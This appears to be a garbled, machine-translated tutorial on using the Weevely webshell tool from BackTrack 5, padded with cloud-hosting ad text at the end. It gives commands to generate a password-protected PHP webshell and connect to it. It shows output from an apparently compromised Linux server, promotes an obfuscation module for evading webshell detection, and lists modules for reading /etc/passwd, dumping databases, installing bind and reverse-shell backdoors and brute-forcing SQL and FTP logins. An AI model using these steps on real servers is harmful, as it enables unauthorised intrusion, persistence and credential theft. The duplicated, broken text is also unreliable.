Weevely is a common webshell backdoor connection tool in BT5. It plays a similar role as chopper ).
Root @ BT:/pentest/backdoors/web/weevely #./Weevely. py generate ices gen. php
// Generate a PHP webshell with the password ices.
Root @ BT:/pentest/backdoors/web/weevely #./Weevely. pyHttp: // app. *. CN/common/GEN. phpICES
//./Weevely. py http: // *. com/webshell. php [Password] connection
Apache @ hqebwebj:/APP/ecccs/web/common $:System.info
// Press the tab key twice to enter the control mode. For example, enter system.info to obtain system information.
Whoami: Apache
Hostname: hqebwebj
Basedir:/APP/ecccs/web/common
Uname: Linux hqebwebj 2.6.18-92. EL5 #1 SMP Tue APR 29 13:16:15 EDT 2008 x86_64 GNU/Linux
OS: Linux
Document_root:/home/ecccs/Web
Safe_mode: 0
Script:/common/GEN. php
Client_ip: 120.3 *. 56.156.
Max_execution_time: 30
Php_self:/common/GEN. php
Apache @ hqebwebj:/APP/ecccs/web/common $CAT/etc/issue
Red Hat Enterprise Linux Server Release 5.2 (tikanga) Kernel
// Execute Common commands
Encryption
Cold Nights extract weevely'sPHP encryption module(In fact, this is the highlight of this article, used to eliminate webshell)
$Python test. py original. php password. php
For example, the encrypted PHP statement webshellCodeOnly the well-known str_replace function appears, and no other keywords appear, which is very difficult to find and kill.
Function module
System system.info // collect the system information file. read // read the file. upload // upload a local file. check // check the file permission and file. enum // enumerate the remote file in the local vocabulary in writing. download // download remote binary/ASCII files to local SQL. query // Execute SQL query SQL. console // start SQL console SQL. dump // obtain SQL database dump. summary // obtain the table and column backdoor in the SQL database. TCP // TCP port backdoor. install // install backdoor. reverse_tcp // rebound enumeration audit. user_files // list common confidential files in the user's home. user_web_files // lists common web files audit. etc_passwd // enumeration/etc/passwd find. webdir // find the writable web directory. perm // find the read/write/executable file and directory. name // find the file and directory by name. suidsgid // search for SUID/SGID files and directories. SQL // brute force cracking single SQL user bruteforce. SQL _users // brute force cracking SQL password bruteforce. FTP // brute force cracking single FTP user bruteforce. ftp_users // brute force cracking FTP password system system.info // collect system information file. read // read the file. upload // upload a local file. check // check the file permission and file. enum // enumerate the remote file in the local vocabulary in writing. download // download remote binary/ASCII files to local SQL. query // Execute SQL query SQL. console // start SQL console SQL. dump // obtain SQL database dump. summary // obtain the table and column backdoor in the SQL database. TCP // TCP port backdoor. install // install backdoor. reverse_tcp // rebound enumeration audit. user_files // list common confidential files in the user's home. user_web_files // lists common web files audit. etc_passwd // enumeration/etc/passwd find. webdir // find the writable web directory. perm // find the read/write/executable file and directory. name // find the file and directory by name. suidsgid // search for SUID/SGID files and directories. SQL // brute force cracking single SQL user bruteforce. SQL _users // brute force cracking SQL password bruteforce. FTP // brute force cracking single FTP user bruteforce. ftp_users // brute force FTP password cracking
Weevely-knife in LinuxStart building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
